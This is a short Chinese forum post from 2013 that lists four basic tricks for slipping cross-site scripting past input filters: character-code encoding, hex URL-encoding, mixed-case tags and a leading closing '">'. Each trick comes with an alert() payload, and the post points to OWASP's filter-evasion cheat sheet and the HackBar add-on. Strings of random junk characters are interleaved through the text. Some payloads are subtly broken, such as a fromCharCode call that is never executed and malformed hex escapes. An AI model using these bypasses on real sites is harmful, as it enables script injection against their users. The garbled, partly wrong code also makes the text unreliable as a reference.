四种超级基础的绕过方法。
% r! p9 n( M! @ P9 ^" N7 A1.转换为ASCII码
7 e4 K, m5 {0 V, W% f! D; @3 o例子:原脚本为<script>alert(‘I love F4ck’)</script >. b. n2 g: M, [
通过转换,变成:
' U+ ?% A; c; o, }* l: |: f<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>7 p) e0 v' G7 {" c" _
' Q0 K9 o2 Y% b, f" l) e! E6 g% H
2.转换为HEX(十六进制)
5 y4 ^% C( {6 p9 D# E* J例子:原脚本为<script>alert(‘I love F4ck’)</script>
* P+ ~5 A# G. y8 p- t2 `1 b4 m5 Y通过转换,变成:% q- o+ m! u7 I H% B. X. o
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
+ e7 A) V* {& S H m3 _: D7 T0 B5 y9 q
4 H; A* z7 {5 e% I- _4 b- \$ J+ @) B3.转换脚本的大小写
+ Y( ~: n5 W/ k例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 X+ G+ z# [! E5 d转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
: S1 _5 I% H* |* ]- ~; d2 Y # b; s8 N" _6 v7 ?1 g
4.增加闭合标记”>9 a) p* S" {# T8 [$ F9 X8 W
例子:原脚本为<script>alert(‘I love F4ck’)</script>
) l; b7 T) m3 M7 J2 @ ?转换为:”><script>alert(‘I love F4ck’)</script>
0 W/ [7 Q9 z+ v- ^% L; [更详细绕过技术请参考此网页, t5 b9 X: c) s S2 L6 O
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" l2 I! X4 ^, o7 ], n4 W/ G+ w6 s% Q
s# `' E, ?+ G
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对